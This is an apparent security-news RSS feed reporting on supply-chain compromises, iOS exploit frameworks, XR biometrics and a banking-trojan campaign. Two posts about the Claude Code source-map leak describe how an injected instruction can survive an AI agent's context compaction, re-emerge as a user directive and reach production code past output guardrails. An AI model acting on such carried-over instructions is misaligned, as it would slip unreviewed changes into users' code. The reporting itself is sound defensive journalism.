<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
    <title>Triage Security Blog</title>
    <description>Latest news, insights, and updates from Triage Security.</description>
    <link>https://security.shortwaves.live/blog</link>
    <atom:link href="https://security.shortwaves.live/blog/rss.xml" rel="self" type="application/rss+xml" />
    <language>en-us</language>
    <lastBuildDate>Sun, 05 Apr 2026 17:20:05 GMT</lastBuildDate>
    
    <item>
        <title>Navigating Recent Supply Chain Incidents and Mobile OS Patching Shifts</title>
        <link>https://security.shortwaves.live/blog/3f5ea2a1-9e89-479b-babc-59e1ea30952b</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/3f5ea2a1-9e89-479b-babc-59e1ea30952b</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:29 GMT</pubDate>
        <description>Recent security incidents involving modified open-source development tools and new mobile OS vulnerabilities require immediate attention from security teams. This briefing details the technical findings and provides actionable remediation steps to protect CI/CD pipelines and enterprise mobile fleets.</description>
        <content:encoded><![CDATA[
            The security community is currently navigating a dense cluster of software supply chain incidents and a rare shift in mobile OS patching strategy, both of which show how rapidly the window for defensive response is closing. For security teams, the most immediate development is Apple’s decision to backport critical patches for the DarkSword vulnerability sequence to iOS 18. This move, finalized on April 1, is designed to protect organizations that utilize "n-minus-one" patching policies. Strategies that typically favor stability by staying one major version behind the current release. While Apple usually limits security updates for older operating systems to hardware that cannot support the newest software, the public leak of DarkSword’s methodology on GitHub on March 22 forced a change in posture. The availability of these tools to unauthorized parties means that remaining on a previous OS version introduces elevated risk for enterprise fleets.

The broader situation today is dominated by the expanding fallout from TeamPCP’s supply chain campaign. Within the last 48 hours, both the AI startup Mercor and the European Commission (EC) have disclosed significant security incidents tied to modified open-source tools. These events demonstrate a highly compressed intrusion timeline; in the case of the EC, threat actors obtained an AWS API key on March 19, the exact same day TeamPCP began distributing a modified version of the Trivy code-scanning tool. This indicates that the response window for supply chain incidents has shrunk from days to hours. Furthermore, the situation has been complicated by a convergence of threat actors. While TeamPCP initiated the intrusions, secondary groups like ShinyHunters and Lapsus$ are now claiming to possess massive datasets—91 GB from the EC and 4 TB from Mercor, suggesting that once initial access occurs, multiple threat groups may move in simultaneously to monetize the exposure.

## Technical capabilities of mobile and cloud threats

Technically, the DarkSword and Coruna frameworks represent a significant escalation in mobile surveillance capabilities. Coruna is a sophisticated, multi-sequence framework comprising 23 vulnerabilities that allows threat actors to establish command-and-control over SMS. This effectively turns an iPhone into a self-propagating platform for harvesting contacts and distributing unsafe links. DarkSword presents unique detection challenges. Unlike Coruna, it does not root the device. Instead, it inherits the privileges of legitimate processes and escalates just enough to access processors with Ring 0 access. This stealthy approach (T1068) makes it nearly invisible to traditional root detection mechanisms. Defenders should be aware that while Apple’s updates mitigate these specific risks, the market for "n-day" iOS frameworks is expanding, and criminal campaigns have already been observed spoofing organizations like the Atlantic Council to deliver these unauthorized components.

In the cloud and development space, the methodology used by TeamPCP reveals a systemic weakness in CI/CD pipelines (T1195.002). After gaining initial access through modified packages like Trivy or the Axios JavaScript library, actors consistently use the TruffleHog tool to hunt for unsecured credentials (T1552) within AWS, Azure, and SaaS environments. This has led to the extraction of sensitive data including S3 buckets and container instances. The risk is being amplified by the rapid integration of generative AI into development workflows. Data from the 2026 Open Source Security and Risk Analysis (OSSRA) report shows that AI-driven development has contributed and a 74% year-over-year increase in codebase size, while the mean number of vulnerabilities per codebase has surged by 107%. Many of these findings trace back to "zombie components"—outdated libraries that have seen no development activity for years but remain embedded in critical infrastructure.

The recent accidental publication of a source map for Anthropic’s Claude Code tool further illustrates the fragility of the modern developer workstation. By exposing over half a million lines of TypeScript, the leak provided a roadmap for researchers and threat actors to understand the internal context pipelines and sandbox boundaries of AI coding agents. For defenders, the primary concern is that a compromised AI agent, which maintains persistent access to the shell and network, could allow an unauthorized instruction to survive "context compaction" and eventually flow into production code. This introduces a new class of persistence that bypasses standard output guardrails.

## Remediation and continuous authentication

For security teams, the priority is an immediate audit of CI/CD runners and the rotation of all cloud credentials that may have been exposed to affected tools like Trivy, KICS, or LiteLLM. Simply removing a modified package is insufficient; if an API key was harvested, the unauthorized party likely already has a foothold in adjacent environments. Organizations should also reassess their "n-minus-one" policies for mobile devices. While these policies are intended to ensure uptime, the DarkSword incident proves that threat actors can leverage the gap between OS releases faster than many IT departments can react. Monitoring for anomalous activity in cloud environments, specifically unauthorized use of TruffleHog or unusual S3 bucket access—is essential.

Looking forward, the shift toward continuous biometric authentication may offer a way to secure these high-trust environments. Researchers at Rutgers University have developed "VitalID," a software-based approach for XR headsets that uses motion sensors to analyze skull vibration harmonics generated by a user’s heartbeat and breathing. This provides a passive, continuous authentication signal that ensures the authorized user is still the one wearing the device, preventing session hijacking in spatial computing environments. While still in the research and SDK phase, such technologies represent a necessary move away from initial access checks toward a model of constant verification.

At this stage, several aspects of the TeamPCP campaign remain uncertain, including the true extent of the data removed including Mercor and whether the overlap between TeamPCP and extortion groups like Lapsus$ represents a formal partnership or parallel competitive activity. Security teams should operate under the assumption that any secret exposed and a compromised development tool is fully compromised and prioritize total credential re-issuance.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Recent supply chain incidents reveal systemic risks in CI/CD and AI development pipelines</title>
        <link>https://security.shortwaves.live/blog/4ae04b45-a246-4c47-a0dd-b28403d1a0c9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/4ae04b45-a246-4c47-a0dd-b28403d1a0c9</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:28 GMT</pubDate>
        <description>A cluster of software supply chain events involving major open-source projects and AI coding assistants demonstrates the vulnerabilities inherent in modern development environments. By analyzing these incidents alongside recent open-source risk data, security teams can implement structural safeguards to protect continuous integration pipelines and credential-rich developer workstations.</description>
        <content:encoded><![CDATA[
            A sequence of security incidents affecting widely used software projects within a 10-day period points to a growing requirement for systemic oversight in software supply chains. Events involving the Trivy security scanner, the Axios JavaScript package, Checkmarx's KICS static-code analyzer, the LiteLLM Python library, and the accidental publication of Anthropic's Claude Code source map all demonstrate how development pipelines have become primary surfaces for risk.

These incidents stemmed from varying root causes but shared similar outcomes. Unauthorized parties leveraged a misconfigured GitHub Action in Trivy to capture credentials and push unauthorized code. For Axios, the compromise of a lead maintainer's account resulted in unsafe modifications landing in development environments. Checkmarx acknowledged a similar issue affecting its open-source KICS static-analysis tool via GitHub Actions, prompting the company to advise developers to revoke and rotate secrets and to review their deployment pipelines for suspicious indicators.

In the same period, human error led to the accidental publication of a 59.8MB source map for Anthropic's Claude Code npm package. The file exposed over half a million lines of TypeScript source code. Anthropic responded by issuing copyright violation notices to 96 explicit mirrors on GitHub. During this process, an initial network-wide takedown temporarily affected 8,100 legitimate forks of Anthropic’s public repositories, which the company subsequently corrected.

Jun Zhou, full stack engineer at Straiker, an agentic AI security firm, notes that developer environments are particularly sensitive targets. "Developer workstations are credential-rich, high-trust, low-visibility zones, and AI coding agents operating inside them are amplifying the exposure," Zhou says. The analysis of the Anthropic incident showed that while Claude Code utilized more than 25 bash security validators in its runtime, the publication process lacked a basic content check to prevent the source map from reaching a public registry.

Rami McCarthy, a principal security researcher at Wiz, observes that these events represent common ecosystem weaknesses rather than isolated zero-day vulnerabilities. "We've built a global software infrastructure that relies heavily on the volunteer efforts of open source maintainers, which creates an incredibly uneven security surface," McCarthy says. When unauthorized parties target transitive dependencies, the downstream impact requires complex, ecosystem-wide coordination. The Axios package alone has more than 70,000 direct dependencies, giving any unauthorized modification a substantial scope of impact.

The reality of modern development requires treating the supply chain as critical infrastructure. Security teams are encouraged to build guardrails into continuous integration and continuous deployment (CI/CD) environments, assume dependencies are untrusted by default, and implement ecosystem-wide detection for abnormal package behavior.

The widespread adoption of generative AI has accelerated software creation, which in turn introduces new complexities to supply chain management. According to Black Duck’s 2026 Open Source Security and Risk Analysis (OSSRA) report, which analyzed 947 commercial codebases across 17 industries, the integration of AI tools correlates with a 74% year-over-year increase in the mean number of files per codebase, and a 30% increase in open-source components.

The OSSRA data shows that 65% of organizations experienced a software supply chain incident in the past 12 months. Concurrently, the mean number of open-source vulnerabilities per codebase rose by 107% to an average of 581. The audit found that 87% of codebases contained at least one vulnerability, with 78% housing high-risk issues and 44% containing critical-risk findings. Additionally, 68% of codebases contained open-source license conflicts.

Tim Mackey, head of software supply chain risk strategy at Black Duck, cautions that development teams often interpret vulnerability management as simply updating every component to the newest release. However, the data indicates that older versions sometimes offer a more stable balance of patched code and fewer known issues—with the third-most recent version frequently being the most secure on average.

"Immediate patching seems reasonable, but in reality teams need to perform a risk-based analysis of their dev processes," Mackey says, noting that the residual effects of compromised container images can persist over time. The Black Duck report also identified a pervasive "zombie component" issue: 93% of codebases contained components with no development activity in the past two years, 92% contained components four or more years out of date, and only 7% utilized the latest versions.

The public availability of Claude Code's architecture provides a clear view into how AI workflows operate, which moves faster than the security practices designed to monitor them. Jesus Ramon, an AI red team member at Straiker, explains that the exposed code reveals the context pipeline, sandbox boundaries, and permission validators. This visibility allows researchers to understand how cooperative AI models manage data.

Traditional unauthorized packages operate within a bounded runtime. However, an AI coding agent generally maintains access to the file system, shell, network, and Model Context Protocol (MCP) servers. Ramon notes that this introduces a new class of persistence: a manipulated instruction can survive "context compaction"—the process by which the model summarizes and compresses older session data—and re-emerge as a legitimate user directive. From there, it can flow naturally into pull requests and production code without triggering standard output guardrails.

To protect these evolving environments, organizations should focus on restricting access to sensitive CI/CD credentials and implementing rigorous secret-management practices. Security teams can improve resilience by validating dependencies early, limiting session lengths for AI agents to reduce the compaction window, and vetting MCP servers with the same scrutiny applied to standard npm dependencies.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating skull vibration harmonics for continuous XR authentication</title>
        <link>https://security.shortwaves.live/blog/e8441b1b-735f-4898-8eb3-2aae512ab181</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e8441b1b-735f-4898-8eb3-2aae512ab181</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:27 GMT</pubDate>
        <description>Researchers at Rutgers University have developed a methodology for continuous biometric authentication in extended reality (XR) headsets using vital-sign harmonics. This approach offers a passive mechanism to verify user identity and maintain secure session states in enterprise immersive environments.</description>
        <content:encoded><![CDATA[
            Biometric authentication continues to evolve to protect emerging technology environments. A research team led by Rutgers University recently introduced a novel biometric authentication software designed for extended reality (XR) headsets—encompassing virtual and mixed reality hardware. The research focuses on safeguarding digital identities in immersive spaces by analyzing skull vibration harmonics generated by vital signs.

While immersive technology adoption varies in the consumer market, enterprise organizations increasingly rely on XR hardware. Aerospace firms use it for 3D training, and engineers utilize spatial mapping for complex design work. In these environments, protecting sensitive proprietary data and intellectual property requires reliable authentication mechanisms. This research arrives as the security community advocates for stronger access controls, prioritizing passkeys, multifactor authentication (MFA), biometrics, and FIDO security keys to mitigate the risks of credential compromise and prepare for post-quantum cryptographic standards.

## The mechanics of VitalID

The technology, named VitalID, operates entirely as software. It leverages the built-in motion sensors of an XR headset to capture low-frequency mechanical vibrations in the skull produced by a user's breathing and heartbeat.

According to the research summary, these harmonics contain unique biometric signatures specific to a wearer's head and facial structure. The system extracts biometric features including the ratios among these harmonic frequencies. It then applies an adaptive filtering method to reduce motion distortion and uses attention-based deep learning models and maintain continuous user authentication throughout an XR session without requiring active user input. A patent application has been filed for VitalID, and it is positioned for licensing as a software development kit (SDK) or OS-level integration.

## Contextualizing continuous authentication

While VitalID addresses a specific hardware use case, it builds on previous concepts in specialized environments. For example, SkullConduct previously explored user identification via bone conduction in eyewear computing, and the Nymi Band integrates electrocardiogram (ECG) data for authentication in IT and operational technology (OT) spaces.

For most organizational devices outside of XR, established practices remain the baseline. Karolis Arbaciauskas, head of product at NordPass, notes that pairing on-device biometrics with passkeys provides a highly practical path for many organizations. This combination creates a system that is resistant to credential compromise by design, avoids shared secrets, and offers a clear migration path to post-quantum cryptography once platforms standardize it.

However, identity security experts recognize the specific protective value of the Rutgers research for immersive environments. Ralph Rodriguez, president and chief product officer at Daon, points out that the methodology provides a passive, built-in, continuous authentication signal using existing commodity sensors.

Rather than replacing core identity systems—such as account recovery, identity proofing, or strong cryptography—VitalID functions as a continuity and reauthentication mechanism. As enterprise applications, collaboration tools, and health data become accessible through XR headsets, the security requirement shifts including verifying the initial login and ensuring the trusted user remains present over time. Implementing continuous authentication helps maintain a secure session state in environments where a single front-door access check is insufficient.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Scope of TeamPCP supply chain compromises expands alongside overlapping threat activity</title>
        <link>https://security.shortwaves.live/blog/ef53161c-cb3e-4569-b21a-e6e2648fa9c9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/ef53161c-cb3e-4569-b21a-e6e2648fa9c9</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:27 GMT</pubDate>
        <description>Following recent compromises involving the LiteLLM and Trivy open-source projects, secondary threat groups are attempting to monetize the exposed data. Organizations must rapidly rotate credentials and audit CI/CD pipelines to mitigate the risk of unauthorized cloud access.</description>
        <content:encoded><![CDATA[
            The impact of TeamPCP's recent supply chain compromises continues to expand across the enterprise field. Following earlier reports of unauthorized code introduced into open-source projects, two affected organizations disclosed related security incidents this week.

On Tuesday, the AI startup Mercor stated on the social media platform X that it was among the companies impacted by a supply chain incident involving LiteLLM. Two days later, the EU's Computer Emergency Response Team (CERT-EU) disclosed that a recent unauthorized access event affecting the European Commission's cloud and web infrastructure stemmed from the previously documented Trivy software supply chain compromise, which is also attributed to TeamPCP. According to CERT-EU, the EC inadvertently installed a modified version of the Trivy code-scanning tool. This installation enabled threat actors to harvest credentials and ultimately access the organization's Amazon Web Services (AWS) environment.

The involvement of third-party extortion groups has complicated the incident response process. CERT-EU confirmed that the cybercriminal group ShinyHunters published an exfiltrated dataset on its leak site, claiming to possess over 91 GB of sensitive EC data, including emails, databases, and confidential documents. Similarly, Lapsus$—a group associated with ShinyHunters and the Scattered Spider collective—claimed to hold 4 TB of Mercor's internal data, including nearly a terabyte of the company's source code. Mercor did not confirm this claim at press time.

It remains unclear exactly how these secondary groups acquired the overlapping data, but security professionals emphasize that organizations must address these converging risks promptly.

## Cloud access methodology and credential harvesting

Disclosures including Mercor and the EC align with technical observations that TeamPCP is actively utilizing stolen credentials to access enterprise cloud infrastructure. Wiz noted that its customer incident response team (CIRT) has observed and responded to multiple incidents where TeamPCP actors used harvested secrets and access victims' AWS, Azure, and software-as-a-service (SaaS) environments.

Wiz researchers detailed how threat actors used the TruffleHog open-source tool to discover and validate exposed credentials within AWS environments. Following initial reconnaissance, the actors accessed resources such as S3 buckets and Amazon Elastic Container Service (ECS) instances to exfiltrate data.

CERT-EU outlined a nearly identical sequence in the European Commission incident. After the modified version of Trivy was deployed, unauthorized actors extracted an AWS API key that provided control over AWS accounts. They subsequently used TruffleHog to locate additional credentials, conducted reconnaissance, and exfiltrated data.

The timeline of these events demonstrates a highly compressed response window. According to CERT-EU, threat actors obtained the EC's API key on March 19—the exact day TeamPCP began distributing modified versions of Trivy. This occurred a day before the Trivy compromise was publicly flagged and several days before Aqua Security, the project’s maintainer, issued a formal disclosure.

Ensar Seker, CISO at SOCRadar, notes that speed of execution is the primary takeaway. "In practice, the response window is now measured in hours, not days," Seker says. "The biggest mistake would be to remove the malicious package but leave the stolen credentials usable, because by then the attackers may already be operating inside adjacent environments."

To effectively mitigate these risks, Seker advises organizations to immediately revoke and rotate exposed secrets, invalidate all tokens, and reissue cloud credentials. Security teams should also review CI/CD runners, inspect GitHub Actions and package publishing workflows, and monitor their cloud and SaaS environments for anomalous activity.

## Convergence of threat actors and evolving risks

The situation is further complicated by the concurrent activities of Lapsus$ and ShinyHunters. According to a post on X associated with TeamPCP, the group appears to be in conflict with ShinyHunters rather than actively collaborating.

"What we are seeing looks less like a clean handoff between separate groups, and more like a convergence of cybercriminal ecosystems around the same access," Seker says. While TeamPCP initiated the supply chain compromises and credential theft, other extortion actors are now attempting to monetize the exposures. "At this stage, that does not prove formal operational alignment, but it does strongly suggest that once high-value access or stolen data emerges from a supply chain intrusion, other extortion actors can move in very quickly to amplify pressure, visibility, and potential profit," Seker notes.

Furthermore, TeamPCP has announced a partnership with Vect, a ransomware group. Tomer Peled, a security researcher at Akamai, observes that this changes the risk profile significantly. Peled notes that the collaboration could provide Vect with access to numerous affected organizations, subjecting them to potential ransomware deployment through TeamPCP's remote access trojan (RAT).

As Akamai documented recently, the modified Telnyx PyPI package contained a three-stage RAT that provides backdoor access to environments running the affected SDK. Given the volume of credentials already obtained by TeamPCP, Peled anticipates the discovery of additional compromised libraries. He assesses that the group will likely use their stolen credentials to continue installing unauthorized access tools across as many systems as possible.

Seker concludes that the involvement of additional threat groups fundamentally alters how organizations must view software supply chain risks. "The old assumption was that a software supply chain attack was mainly a downstream integrity problem," he says. "What these cases show is that it can become an immediate enterprise breach problem, where compromised packages lead to stolen secrets, cloud access, SaaS exposure, repository cloning, and then possible extortion by additional actors."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Apple backports DarkSword vulnerability patch to iOS 18</title>
        <link>https://security.shortwaves.live/blog/efb2c2da-8831-40fd-9e17-c65186b98b88</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/efb2c2da-8831-40fd-9e17-c65186b98b88</guid>
        <pubDate>Sat, 04 Apr 2026 03:13:26 GMT</pubDate>
        <description>Apple has extended its security updates for the DarkSword vulnerability chain to iOS 18 devices. This backported patch provides critical protection for organizations relying on n-minus-one patching policies, allowing teams to secure their endpoints without forcing an immediate operating system upgrade.</description>
        <content:encoded><![CDATA[
            After a brief delay, Apple has addressed the vulnerabilities associated with the DarkSword chain for all affected customers, including those who have remained on iOS 18 rather than updating to iOS 26. This release is a significant benefit for organizations managing large device fleets, particularly those enforcing n-minus-one patch management policies that require users to stay one version behind the latest release.

When researchers identify severe vulnerabilities in Apple devices, the company historically provides updates for the latest operating system (OS) and for older devices that lack the hardware to support the new software. For example, when researchers analyzed Coruna, a sophisticated vulnerability framework comprising five distinct sequences across 23 vulnerabilities in iOS versions 13 to 17.2.1—Apple distributed updates to all affected hardware, including older, un-updatable models.

However, users whose devices are capable of upgrading to the newest OS, but who remain on an older version due to corporate mandates or user experience preferences, typically fall outside this support window. For instance, many users have stayed on iOS 18 rather than adopting iOS 26 (which are consecutive major versions in this release cycle). When Apple initially addressed the DarkSword sequence in iOS 26 last year, and subsequently pushed a fix for un-updatable pre-iOS 18 devices on March 24, iOS 18 users faced a difficult choice: execute a full OS upgrade or accept the known security risk.

This posture shifted after the DarkSword methodology was published to GitHub on March 22. With the tooling publicly accessible to unauthorized parties, Apple extended the security update to iOS 18 devices on April 1, providing a necessary safeguard for these remaining users.

Justin Albrecht, principal researcher at Lookout, views the update as a positive shift for user protection. "Apple has taken multiple unprecedented steps on iOS to counter DarkSword and Coruna, to include the backported patches, alert notifications to susceptible devices and published threat guidance on Web-based [incidents]," Albrecht notes. He emphasizes that Apple's serious response should encourage organizations to prioritize applying these updates.

## The technical impact of DarkSword

Initial discussions of DarkSword were somewhat eclipsed by the public disclosure of the Coruna framework earlier the same month.

Coruna is a highly capable tool utilized by advanced threat actors, with evidence suggesting origins as a military contractor project. Rocky Cole, co-founder of iVerify, explains that the framework could establish command-and-control (C2) over SMS. A minor modification could allow it to harvest contacts and distribute messages containing malicious links, effectively creating self-propagating software. Cole identifies this as one of the most severe endpoint risks observed on the platform, prompting Apple's rapid mitigation.

DarkSword was disclosed two weeks after Coruna. While initially viewed as a secondary issue, Cole points out that its methodology is technically stealthier.

"In some ways it's more pernicious, because it didn't root the device," Cole explains. "Coruna rooted. So presumably, if you were doing root detection, you stood a chance of maybe seeing Coruna. But DarkSword doesn't root, it just inherits the privileges of the processes. It gets just enough privilege escalation to access processors that too have Ring 0 access. So in that regard, I think it's actually much harder to detect."

Cole notes that the high adoption rate of iOS 18 compared to iOS 17 (the latest version affected by Coruna), combined with the public availability of the code on GitHub prior to a backported patch, created a significant exposure window that required immediate remediation.

Prior to the leak, operators of surveillance software were already utilizing DarkSword. Following its publication, Lookout's Albrecht observed several active campaigns. "We’ve observed a handful of campaigns being conducted with the malware, to include [an] email phishing campaign conducted by TA446 which spoofed the Atlantic Council. The other campaigns observed appear to be unattributed criminal campaigns which we have been unable to link to a specific group, as well as multiple instances of apparent testing of the malware for unknown purposes."

## Managing ongoing endpoint risk

For enterprise security teams, the timeline of the DarkSword updates highlights ongoing challenges in vulnerability management. Cole notes the gap between the public exposure of the vulnerabilities on GitHub and the availability of a comprehensive patch across operating systems.

He emphasizes that corporate policies force many users to remain on older OS versions, making comprehensive backporting essential for defense. "Let's say you are a business user and your IT department says you have to use what's called an n-minus-one patching cadence, which means you can only use a version that's one version behind, what are you supposed to do in that situation?" Cole asks. "If the patches aren't being backported to all versions, how are you supposed to defend yourself? To me, this just fundamentally challenges the notion that a patching-only strategy is going to be good enough going forward."

Currently, administrators and users who apply the available Apple device updates will mitigate the risks associated with both DarkSword and Coruna. However, the broader trend requires ongoing vigilance. "What I think DarkSword and Coruna together show is that the market for n-day iOS [vulnerability frameworks] is exploding," Cole warns, noting that the cost to acquire these capabilities has fallen rapidly. While these specific sequences are now mitigated, organizations must remain prepared for similar future methodologies.

## About the author

Nate Nelson is a journalist and scriptwriter. He writes for "Darknet Diaries" — a popular podcast in cybersecurity, and co-created the former Top 20 tech podcast "Malicious Life." Before his current work, he was a reporter at Threatpost.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Analyzing Organizational Resilience and Evasive Propagation in Recent Security Incidents</title>
        <link>https://security.shortwaves.live/blog/b89aa271-71e9-4883-b42b-b85a50b20e7f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/b89aa271-71e9-4883-b42b-b85a50b20e7f</guid>
        <pubDate>Fri, 03 Apr 2026 03:05:21 GMT</pubDate>
        <description>Recent developments involving Hasbro’s incident response and the Water Saci campaign show the value of proactive business continuity and granular email monitoring. By analyzing these events, security teams can refine endpoint protections and test response strategies to safely maintain operations during network disruptions.</description>
        <content:encoded><![CDATA[
            In the last 24 hours, the security environment has been defined by two contrasting stories: one of successful organizational resilience during an active security incident, and another of a persistent malicious actor using deceptive, self-propagating scripts to bypass traditional email defenses. These developments point to a critical reality for modern security teams: while preventing initial access remains the goal, the ability to maintain operations during remediation and to detect hijacked internal communications separates a manageable incident from a broader operational disruption.

The most significant operational update comes from Hasbro, which recently disclosed an unauthorized network access incident discovered on March 28. In an 8-K filing with the Securities and Exchange Commission, the toy and game manufacturer revealed that it is currently in the midst of remediation efforts that may last several weeks. While the company has been forced to take certain systems offline to isolate the affected areas, their proactive business continuity planning allowed them to continue taking orders and shipping products. This demonstrates the measurable value of having tested response strategies in place before an event occurs.

This incident illustrates the risks facing the retail and manufacturing sectors, which manage high-value environments due to their complex supply chains and sensitive customer data. Analysts note that a multi-week recovery timeline often indicates more intensive recovery efforts, such as those following ransomware, though the company has not officially confirmed the specific nature of the unauthorized access. Regardless of the underlying cause, the ability to navigate a cyber incident without escalating into a full-scale operational crisis is a result of active pressure-testing and simulation, rather than static plans.

Concurrently, a different type of campaign is evolving across Latin America and Spain. A financially motivated group known as Water Saci, or Augmented Marauder, has expanded its reach with a multi-pronged campaign distributing the Casbaneiro banking trojan. This activity relies on self-propagating email scripts that turn affected accounts into distribution hubs. By leveraging trusted sender relationships, the group significantly increases the likelihood that their social engineering attempts will bypass security filters and deceive users.

The technical mechanics of this campaign are designed to evade standard signature-based detection. The sequence typically begins with a phishing email themed around a vague judicial summons. If a user clicks the provided link, they download a password-protected ZIP file containing an unauthorized executable. These ZIP files are often given randomized names for each recipient, creating obstacles for Secure Email Gateways (SEGs) that rely on static indicators. Once the file executes, a script known as Horabot takes control of the affected user's email account. It filters the user's contacts and sends out a new wave of phishing emails, attaching a modified, password-protected version of the initial file.

Once established, the ultimate objective is the deployment of Casbaneiro. This trojan is engineered to activate when a user accesses financial services or cryptocurrency platforms, using screen overlays to capture keystrokes and credentials. It targets a wide array of institutions, including major regional providers like Santander and Banco do Brasil, as well as global platforms like Binance. Despite this sophistication in delivery, researchers note that the malware itself often struggles against modern endpoint protections. In environments with up-to-date security controls, Windows Defender and other EDR solutions frequently identify and block the AutoIT executables used by Water Saci before they can achieve their final objectives.

For defenders, these concurrent developments offer clear priorities. The Hasbro incident shows the necessity of moving beyond prevention-only mindsets. Security teams should prioritize testing their business continuity plans through real-world simulations to ensure that if systems must be taken offline, core revenue-generating operations can persist. This requires close coordination between IT, security, and logistics teams to identify which offline workarounds are actually viable under pressure.

From a detection standpoint, the Water Saci campaign indicates a need for more granular email monitoring. Because the Horabot script uses legitimate, internal, or trusted external accounts to propagate, defenders cannot rely solely on sender reputation. Organizations should consider implementing rules that flag or quarantine password-protected attachments from suspicious sources or those containing uncommon file types like AutoIT scripts. Furthermore, since these campaigns often use randomized filenames, behavioral analysis of the endpoint—monitoring for unauthorized attempts to access contact lists or automate mail sending—is more effective than searching for static hashes.

Looking forward, the persistence of banking trojans in the LATAM region suggests that while these threats are established, they remain profitable enough for malicious actors to continue refining their delivery methods. The shift toward self-propagation via Horabot indicates that unauthorized parties are increasingly aware of the trusted sender blind spot in many security architectures. At the same time, the Hasbro incident provides a blueprint for how large organizations can manage a network disruption without paralyzing their entire business model.

At this stage, the exact entry vector for the Hasbro incident remains undisclosed, and it is unclear if the unauthorized access resulted in any exposure of data. Similarly, while Casbaneiro is often blocked by modern endpoints, its continued use suggests it still finds success in environments with lagging update cycles or fragmented security stacks. We recommend that security teams remain vigilant for judicial-themed phishing and ensure that their endpoint protection rules are specifically tuned to catch the behavioral signatures of credential-harvesting overlays and automated propagation scripts.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Bank Trojan &apos;Casbaneiro&apos; Utilizes Self-Propagating Techniques Across Latin America</title>
        <link>https://security.shortwaves.live/blog/24ca3b6e-405f-423a-81c9-c218aad3a515</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/24ca3b6e-405f-423a-81c9-c218aad3a515</guid>
        <pubDate>Fri, 03 Apr 2026 03:05:20 GMT</pubDate>
        <description>A financially motivated threat group known as Water Saci is distributing the Casbaneiro banking trojan across Latin America and Spain. By utilizing self-propagating email scripts and social engineering, the campaign aims to capture credentials, though modern endpoint defenses remain highly effective at disrupting this activity.</description>
        <content:encoded><![CDATA[
            Operations originating in Brazil continue to target banking credentials across Spanish-speaking regions using highly self-propagating and evasive delivery mechanisms.

While other regions are often associated with large-scale cryptocurrency incidents or specialized surveillance software, Brazil has developed a prominent ecosystem for banking malware. Threat actors in the region consistently develop financial trojans at a rapid pace, challenging security analysts to track their evolving methodologies.

The cybercrime operation tracked as Water Saci, or Augmented Marauder, has been central to this activity for several years. Recently, the group has divided its resources between two financially motivated campaigns. One campaign operates over [WhatsApp](https://www.darkreading.com/cyberattacks-data-breaches/self-propagating-malware-hits-whatsapp-users-brazil), focuses primarily on Brazil, and has been monitored by researchers since last year.

Security firm BlueVoyant has now identified a [parallel campaign](https://www.bluevoyant.com/blog/augmented-marauders-multi-pronged-casbaneiro-campaigns) operating via email, extending its reach through Latin America and Spain. This latest iteration of Water Saci's methodology features self-propagating capabilities, techniques to bypass email security controls, and mechanisms for financial data theft.

"This threat group seems as if they have a campaign that they try to launch [roughly] every quarter, and they keep changing it, so it's pretty clear whoever this is [is] very active [and] their end goal is to get access to users' bank accounts within the Latin American region," notes Thomas Elkins, SOC security analyst for BlueVoyant. "To me, it's clear that they're going to keep ramping up."

## A self-propagating banking campaign

At first glance, an Augmented Marauder campaign follows familiar social engineering patterns. Recipients receive a standardized email notification referencing a vague, pending judicial summons. Users who interact with the provided link are directed to a landing page that downloads a malicious ZIP file. However, each step in this sequence includes specific mechanisms designed to evade detection or help propagation to new environments.

The file attached to the phishing email is password-protected, which adds a layer of superficial legitimacy and can obscure the contents from [secure email gateways (SEGs)](https://www.techtarget.com/searchsecurity/buyershandbook/What-secure-email-gateways-can-do-for-your-enterprise). Additionally, the ZIP file name is randomized for each recipient, creating an obstacle for signature-based detection tools.

The most notable characteristic is the method used to distribute the judicial summons email. A script deployed later in the execution sequence, a tool identified as Horabot—is engineered to interact with the affected user's email account for self-propagation. It retrieves and filters the user's contacts, then distributes a new wave of [phishing emails](https://www.cybersecuritydive.com/news/phishing-it-leaders-ai-arctic-wolf/802976/) to these potential targets, attaching a modified version of the judicial summons file secured with a newly generated password.

This self-propagating element presents distinct challenges for defenders. Because new targets receive social engineering emails from recognized contacts, they may be more likely to open the attachments. This trusted sender relationship also reduces the likelihood of the emails being quarantined by standard email security solutions.

"And it's pretty smart because it makes it harder to identify where the attack actually originated from," Elkins points out. Between the self-propagating emails and the automated WhatsApp messages in their concurrent Brazilian campaign, "they're finding new ways to automate their attack chains to not just rely on an attacker-based account." This approach complicates the task of identifying infrastructure controlled by the threat actors.

## The limitations of banking trojans

The ultimate objective of this activity is the deployment of Casbaneiro, a traditional banking trojan that activates when affected users access online cryptocurrency or financial service providers. Its [target list](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojanspy.win32.casbaneiro.rg) is extensive, encompassing major institutions in Central and South America, such as Santander and Banco do Brasil—as well as payment and cryptocurrency platforms like Binance. Following established patterns, the malware uses screen overlays to simulate legitimate login portals, capturing keystrokes and credential data.

